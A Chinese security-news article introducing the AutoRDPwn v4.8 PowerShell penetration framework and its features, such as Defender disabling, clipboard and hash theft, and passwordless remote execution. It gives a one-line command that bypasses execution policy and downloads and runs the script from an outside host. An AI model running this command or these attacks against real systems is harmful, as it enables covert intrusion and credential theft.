freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

AutoRDPwn v4.8:一款功能强大的隐蔽型渗透框架
2019-03-22 15:00:40

今天给大家介绍的是一款名叫AutoRDPwn的隐蔽型渗透框架,实际上AutoRDPwn是一个PowerShell脚本,它可以实现对Windows设备的自动化攻击。这个漏洞允许远程攻击者在用户毫不知情的情况下查看用户的桌面,甚至还可以通过恶意请求来实现桌面的远程控制。

环境要求

PowerShell4.0或更高版本。

新版本v 4.8增加的功能

兼容PowerShell 4.0

自动复制粘贴剪切板中的内容(密码、哈希等)

自动屏蔽Windows Defender(采用了四种不同的方法)

无需密码即可利用PSexec、WMI和Invoke-Command实现远程代码执行

新增攻击方式:DCOM无密码执行

新增攻击模块:远程访问/Metasploit Web传送

新增攻击模块:远程VNC服务器(针对遗留环境)

自动填写主机名、用户名和密码域

可使用-noadmin参数在没有管理员权限的情况下运行攻击模块

工具使用

这款应用程序可以直接在本地使用,也可以远程使用,或者是在两台设备间使用。在引入了额外功能模块之后,该工具甚至还可以导出哈希或密码,获取远程Shell,上传或下载文件,甚至是破解无线网络的密码以及恢复RDP连接历史记录等等。

一行命令即可执行

powershell -ep bypass "cd $env:temp ; iwr https://darkbyte.net/autordpwn.php -outfileAutoRDPwn.ps1 ; .\AutoRDPwn.ps1"

2.png

我们可以在程序的主菜单中查看和选择需要使用或加载的攻击模块:

[1] –PsExec

[2] –Pass the Hash

[3] –Windows Management Instrumentation

[4] –Schedule Task / PSSession

[5] –Windows Remote Assistance

工具的详细使用文档:【传送门

工具截图

3.png4.png

项目地址

AutoRDPwn:【GitHub传送门

* 参考来源:arthastang,FB小编Alpha_h4ck编译,转载请注明来自FreeBuf.COM

# AutoRDPwn # 攻击框架
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者